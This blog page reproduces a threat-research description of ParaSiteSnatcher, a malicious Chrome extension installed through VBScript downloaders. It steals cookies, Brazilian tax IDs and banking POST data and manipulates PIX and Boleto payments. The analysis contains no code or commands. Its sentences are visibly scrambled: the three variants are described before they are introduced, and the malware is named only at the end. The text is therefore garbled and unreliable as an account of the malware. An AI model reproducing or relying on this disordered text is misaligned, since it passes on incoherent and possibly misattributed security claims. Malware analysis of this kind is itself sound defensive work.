This variant incorporates additional obfuscation techniques. This adds a layer of complexity to the code, requiring a reverse operation to decipher the original content. In this iteration, critical strings within the payload are obfuscated using a Reverse String technique. This variant presents a straightforward approach where the payload is not obfuscated, making it relatively easier to analyze and understand. Our analysis has identified three distinct variants of the VBScript downloader, which are characterized by differing levels of obfuscation and complexity: ParaSiteSnatcher is downloaded through a VBScript downloader hosted on Dropbox and Google Cloud and installed onto an infected system. These extensions could potentially be compatible with Firefox and Safari as well, but changes such as the browser namespace are necessary. It is worth noting that while ParaSiteSnatcher specifically targets Google Chrome browsers, the malicious extension will also work on browsers that support Chrome extension API and runtime, such as Chromium-based browsers like newer versions of Microsoft Edge, Brave, and Opera. The malware includes various components that facilitate its operation, content scripts that enable malicious code injection into web pages, monitor Chrome tabs, and intercept user input and web browser communication. Once installed, the extension manifests with the help of extensive permissions enabled through the Chrome extension, allowing it to manipulate web sessions, web requests, and track user interactions across multiple tabs using the Chrome tabs API. We also observed that it can exfiltrate Brazilian Tax ID numbers for both individuals and businesses, as well as cookies, including those used for Microsoft accounts. It can also initiate and manipulate transactions in PIX, a Brazilian instant payment ecosystem, and payments made through Boleto Bancario, another payment method regulated by the Bank of Brazil. Our research shows that the malicious extension is specifically designed to target users in Latin America, particularly Brazil it exfiltrates data from Banco do Brasil- and Caixa Econômica Federal (Caixa)-related URLs. ParaSiteSnatcher also utilizes the powerful Chrome Browser API to intercept and exfiltrate all POST requests containing sensitive account and financial information before the HTTP request initiates a transmission control protocol (TCP) connection. Our investigations on potential security threats uncovered a malicious Google Chrome extension that we named “ParaSiteSnatcher.” The ParaSiteSnatcher framework allows threat actors to monitor, manipulate, and exfiltrate highly sensitive information from multiple sources.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |